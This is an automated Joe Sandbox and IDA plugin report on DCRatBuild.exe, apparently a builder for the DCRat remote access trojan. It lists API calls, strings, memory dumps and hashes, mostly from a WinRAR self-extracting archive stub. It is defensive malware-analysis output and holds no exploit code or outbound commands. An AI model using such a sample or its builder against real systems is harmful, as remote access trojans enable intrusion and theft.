Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: cfc5635d5d47b790a45b886e407ba3a029ac6da1d5fa2ca2579a3853925e004a
Instruction ID: c6b64c20ce76f52d8dee9fdc583db0465c7315e107532f93bb2af8e1a60da96c
Opcode Fuzzy Hash: cfc5635d5d47b790a45b886e407ba3a029ac6da1d5fa2ca2579a3853925e004a
Instruction Fuzzy Hash: AF21A462E0864282EB64BF24A49013DE651EB49F74F641335EB6E877D4CF39F485D390

Function 00007FF7C01A7848 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7C01A57EE), ref: 00007FF7C01A788C
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7C01A57EE), ref: 00007FF7C01A78D2

Strings

csm, xrefs: 00007FF7C01A78BF

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: f9cbc5942d5ed5241ddbc86705efc511784e5adb6a39813d68a5b78bd03bb5cb
Instruction ID: 879a5df0ca9638c0f7e58c34fca54f01861b22f41e75fb9564f8ca29c455c541
Opcode Fuzzy Hash: f9cbc5942d5ed5241ddbc86705efc511784e5adb6a39813d68a5b78bd03bb5cb
Instruction Fuzzy Hash: AB111922618B8582EA259F15F84426DF7A1FB88F94F984230DE8D47B58DF3CE651CB40

Function 00007FF7C018A83C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7C018A847
FindResourceW.KERNEL32 ref: 00007FF7C018A85D

Strings

RTL, xrefs: 00007FF7C018A853

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
Instruction ID: 3ecf265360061aa68d5fd90b3e4c438d1372d1c75df78fa6cef5c9e26d3b2f08
Opcode Fuzzy Hash: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
Instruction Fuzzy Hash: 1FD01291F0970683FF197F727484779D2505B19F51F890038CD1D46750EF6DA2848BA5

Analysis Process: DCRatBuild.exePID: 7140, Parent PID: 4900COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.9%
Total number of Nodes:	1462
Total number of Limit Nodes:	26

Executed Functions

Function 008ED5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008E00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 008E00E4
Part of subcall function 008E00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008E00F6
Part of subcall function 008E00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008E0127

Part of subcall function 008E9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 008E9DAC

Part of subcall function 008EA335: OleInitialize.OLE32(00000000), ref: 008EA34E
Part of subcall function 008EA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 008EA385
Part of subcall function 008EA335: SHGetMalloc.SHELL32(00918430), ref: 008EA38F

Part of subcall function 008E13B3: GetCPInfo.KERNEL32(00000000,?), ref: 008E13C4
Part of subcall function 008E13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 008E13D8

GetCommandLineW.KERNEL32 ref: 008ED61C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 008ED643
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 008ED654
UnmapViewOfFile.KERNEL32(00000000), ref: 008ED68E

Part of subcall function 008ED287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 008ED29D
Part of subcall function 008ED287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 008ED2D9

CloseHandle.KERNEL32(00000000), ref: 008ED697
GetModuleFileNameW.KERNEL32(00000000,0092DC90,00000800), ref: 008ED6B2
SetEnvironmentVariableW.KERNEL32(sfxname,0092DC90), ref: 008ED6BE
GetLocalTime.KERNEL32(?), ref: 008ED6C9
_swprintf.LIBCMT ref: 008ED708
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 008ED71A
GetModuleHandleW.KERNEL32(00000000), ref: 008ED721
LoadIconW.USER32(00000000,00000064), ref: 008ED738
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 008ED789
Sleep.KERNEL32(?), ref: 008ED7B7
DeleteObject.GDI32 ref: 008ED7F0
DeleteObject.GDI32(?), ref: 008ED800
CloseHandle.KERNEL32 ref: 008ED843

Strings

sfxname, xrefs: 008ED6B9
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 008ED6F9
winrarsfxmappingfile.tmp, xrefs: 008ED637
STARTDLG, xrefs: 008ED77E
sfxstime, xrefs: 008ED715
C:\Users\user\AppData\Local\Temp\RarSFX0, xrefs: 008ED5E9

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\RarSFX0$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 788466649-1049768110
Opcode ID: 60af7d5558b8ff3a5069f4b1391a4cf58e30be1cda6c979b258cc63a5ce5d2b9
Instruction ID: 3488fedda36996b2220825175ac0e33b3fa9d4470a030a34f9d0d6b50a898bbb
Opcode Fuzzy Hash: 60af7d5558b8ff3a5069f4b1391a4cf58e30be1cda6c979b258cc63a5ce5d2b9
Instruction Fuzzy Hash: 0061F871A1C391AFD320ABA69C49F6B37ACFB46704F004425F545D22A1DF749948EB62

Function 008DA5F4 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,008DA4EF,000000FF,?,?), ref: 008DA628
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,008DA4EF,000000FF,?,?), ref: 008DA65E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,008DA4EF,000000FF,?,?), ref: 008DA66A
FindNextFileW.KERNEL32(?,?,?,?,?,?,008DA4EF,000000FF,?,?), ref: 008DA692
GetLastError.KERNEL32(?,?,?,?,008DA4EF,000000FF,?,?), ref: 008DA69E

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 8c982593026d561fcdb39f9567d9b9f0777b3fa071dad0cf90cd1457307880fa
Instruction ID: b4b4998103254fcc4e30a64f234ceac965ebd81ae4734aefea651de86f199813
Opcode Fuzzy Hash: 8c982593026d561fcdb39f9567d9b9f0777b3fa071dad0cf90cd1457307880fa
Instruction Fuzzy Hash: 8D418E72508281EFC324EF38D884ADAF7E8FB58350F144A2AF5A9D3240D774E9548B92

Function 008F753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,008F7513,00000000,0090BAD8,0000000C,008F766A,00000000,00000002,00000000), ref: 008F755E
TerminateProcess.KERNEL32(00000000,?,008F7513,00000000,0090BAD8,0000000C,008F766A,00000000,00000002,00000000), ref: 008F7565
ExitProcess.KERNEL32 ref: 008F7577

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 389b01a642f63341d3d651b64db34690dc23cdff3b558cc91a7c5ba06c9d0b35
Instruction ID: bc893f547675b7c8c664cd343806a1c340d0ff1c39b5f998907ce524d4dc91c9
Opcode Fuzzy Hash: 389b01a642f63341d3d651b64db34690dc23cdff3b558cc91a7c5ba06c9d0b35
Instruction Fuzzy Hash: 60E0BF31019548AFDF11AF78DD49A593B69FB48751F108414FA09CA222DB35DE42DA51

Function 008D857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008D8580
_memcmp.LIBVCRUNTIME ref: 008D8A08

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: 3355d7d8d0ec9da3bbb1f45f843562a5c43de93dc972c713904ab800220648ed
Instruction ID: 595bafc6c261475fb4adcd9fa079b3c9bedef059f02ded18fe0a4e8f1baf8237
Opcode Fuzzy Hash: 3355d7d8d0ec9da3bbb1f45f843562a5c43de93dc972c713904ab800220648ed
Instruction Fuzzy Hash: D482E770904245EEDF25DB64C885BFABBA9FF15304F0842BBE899DB342DB315A44CB61

Function 008EAEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008EAEE5

Part of subcall function 008D130B: GetDlgItem.USER32(00000000,00003021), ref: 008D134F
Part of subcall function 008D130B: SetWindowTextW.USER32(00000000,009035B4), ref: 008D1365

Strings

LICENSEDLG, xrefs: 008EB771
-el -s2 "-d%s" "-sp%s", xrefs: 008EB281
winrarsfxmappingfile.tmp, xrefs: 008EB2BC
@, xrefs: 008EB2A7
"%s"%s, xrefs: 008EB423
STARTDLG, xrefs: 008EAF04
<, xrefs: 008EB29A
__tmp_rar_sfx_access_check_%u, xrefs: 008EB1CB
C:\Users\user\AppData\Local\Temp\RarSFX0, xrefs: 008EB2DF

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Local\Temp\RarSFX0$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-1559379598
Opcode ID: 8bb75df9f8b9ff428c6657b3974aab184ef5edcf2d49c3c7da7c93765d8582d3
Instruction ID: 71451e1a7b7d0c8e42e0b27a086a1a3bd37f5d5b05b9cb1fc38d4917d58fa107
Opcode Fuzzy Hash: 8bb75df9f8b9ff428c6657b3974aab184ef5edcf2d49c3c7da7c93765d8582d3
Instruction Fuzzy Hash: AD42E270A58294BEEB21ABA59C8AFEF3B7CFB02704F004155F645E61E1CB745D44EB22

Function 008E00CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 008E00E4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008E00F6
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008E0127
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008E03D4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008E03F0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 008E0402
ReadFile.KERNEL32(00000000,?,00007FFE,00903BA4,00000000), ref: 008E0421
CloseHandle.KERNEL32(00000000), ref: 008E0479
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008E048F
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 008E04E7
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 008E0510
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 008E054A

Part of subcall function 008E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008E00A0
Part of subcall function 008E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008DEB86,Crypt32.dll,00000000,008DEC0A,?,?,008DEBEC,?,?,?), ref: 008E00C2

_swprintf.LIBCMT ref: 008E05BE
_swprintf.LIBCMT ref: 008E060A

Part of subcall function 008D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D401D

AllocConsole.KERNEL32 ref: 008E0612
GetCurrentProcessId.KERNEL32 ref: 008E061C
AttachConsole.KERNEL32(00000000), ref: 008E0623
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 008E0649
WriteConsoleW.KERNEL32(00000000), ref: 008E0650
Sleep.KERNEL32(00002710), ref: 008E065B
FreeConsole.KERNEL32 ref: 008E0661
ExitProcess.KERNEL32 ref: 008E0669

Strings

SetDllDirectoryW, xrefs: 008E00F0
DXGIDebug.dll, xrefs: 008E0169, 008E04D3
SetDefaultDllDirectories, xrefs: 008E0121
dwmapi.dll, xrefs: 008E0194, 008E0581
uxtheme.dll, xrefs: 008E058B
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 008E05F8
kernel32, xrefs: 008E00DD

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1201351596-3298887752
Opcode ID: a357587760e6dad70f0411d9206dc7b170c73de98be36d9715749923d500cbbd
Instruction ID: 7c19195900f2bab29ee2af624879c318b76ca2dbb1ac068015cba6527958dbad
Opcode Fuzzy Hash: a357587760e6dad70f0411d9206dc7b170c73de98be36d9715749923d500cbbd
Instruction Fuzzy Hash: E9D14EB1519384AFD3309F55D849B9BBBFCFB85708F10891DF689D6290DBB086488F62

Function 008EBDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 008EBDFA

Part of subcall function 008EAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 008EAAFE

SetWindowTextW.USER32(?,?), ref: 008EC127
_wcsrchr.LIBVCRUNTIME ref: 008EC2B1
GetDlgItem.USER32(?,00000066), ref: 008EC2EC
SetWindowTextW.USER32(00000000,?), ref: 008EC2FC
SendMessageW.USER32(00000000,00000143,00000000,0091A472), ref: 008EC30A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008EC335

Strings

<br>, xrefs: 008EC08A
%s.%d.tmp, xrefs: 008EBFF6
Software\Microsoft\Windows\CurrentVersion, xrefs: 008EC1D0
ProgramFilesDir, xrefs: 008EC1FB

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: 0ca5b6c8723cd4dfa09a78a81b20c85836febf2f1c11ff6967e76d591af6e228
Instruction ID: 0497978e76eb2f70b0a5c377bc71cc0efdbc55fe0ebb928e10b394d0a45b1795
Opcode Fuzzy Hash: 0ca5b6c8723cd4dfa09a78a81b20c85836febf2f1c11ff6967e76d591af6e228
Instruction Fuzzy Hash: 61E18D72D04268AADB25EBA5DC49DEF73BCFF09310F0041A6F609E3191EB709A859B51

Function 008DD341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 008DD346
_wcschr.LIBVCRUNTIME ref: 008DD367
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,008DD328,?), ref: 008DD382
__fprintf_l.LIBCMT ref: 008DD873

Part of subcall function 008E137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,008DB652,00000000,?,?,?,00010494), ref: 008E1396

Strings

, xrefs: 008DD67A
,, xrefs: 008DD8AE
a, xrefs: 008DD4EF
@%s:, xrefs: 008DD85D, 008DD869
RTL, xrefs: 008DD838
*messages***, xrefs: 008DD4D3
R, xrefs: 008DD4E5
$%s:, xrefs: 008DD856
*messages***, xrefs: 008DD49A

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-980926923
Opcode ID: 5f94f8be3be945a885cb1c67b6331785169b64b11195bd7f6f7650b51d38eb13
Instruction ID: 1d37c1d8cc24f58d157d8f384e34e9f34457221f72d34a8533f29032d383e3f8
Opcode Fuzzy Hash: 5f94f8be3be945a885cb1c67b6331785169b64b11195bd7f6f7650b51d38eb13
Instruction Fuzzy Hash: 4C12B071900319AADF24EFA8DC81BEEB7B5FF44304F10466AE605E7381EB719A41CB65

Function 008ECB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008EAC85
Part of subcall function 008EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008EAC96
Part of subcall function 008EAC74: IsDialogMessageW.USER32(00010494,?), ref: 008EACAA
Part of subcall function 008EAC74: TranslateMessage.USER32(?), ref: 008EACB8
Part of subcall function 008EAC74: DispatchMessageW.USER32(?), ref: 008EACC2

GetDlgItem.USER32(00000068,0092ECB0), ref: 008ECB6E
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,008EA632,00000001,?,?,008EAECB,00904F88,0092ECB0), ref: 008ECB96
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 008ECBA1
SendMessageW.USER32(00000000,000000C2,00000000,009035B4), ref: 008ECBAF
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008ECBC5
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 008ECBDF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008ECC23
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 008ECC31
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008ECC40
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008ECC67
SendMessageW.USER32(00000000,000000C2,00000000,0090431C), ref: 008ECC76

Strings

\, xrefs: 008ECBCF

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 8a446c05226e66e80068e909949cfbfe6e8344e08863e17895ccb82d672b37aa
Instruction ID: f379d6fdc46da5ad1f33f929f865e5141d7f1ec1b0f8751fed98568f360040a0
Opcode Fuzzy Hash: 8a446c05226e66e80068e909949cfbfe6e8344e08863e17895ccb82d672b37aa
Instruction Fuzzy Hash: 4831CD71299742BFE301DF20DC4AFAB7FACEB82704F000518FA51961E1DB645908EBB6

Function 008E9E1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(008EAE4D,PNG,?,?,?,008EAE4D,00000066), ref: 008E9E2E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,008EAE4D,00000066), ref: 008E9E46
LoadResource.KERNEL32(00000000,?,?,?,008EAE4D,00000066), ref: 008E9E59
LockResource.KERNEL32(00000000,?,?,?,008EAE4D,00000066), ref: 008E9E64
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,008EAE4D,00000066), ref: 008E9E82
GlobalLock.KERNEL32(00000000,?,?,?,?,?,008EAE4D,00000066), ref: 008E9E93
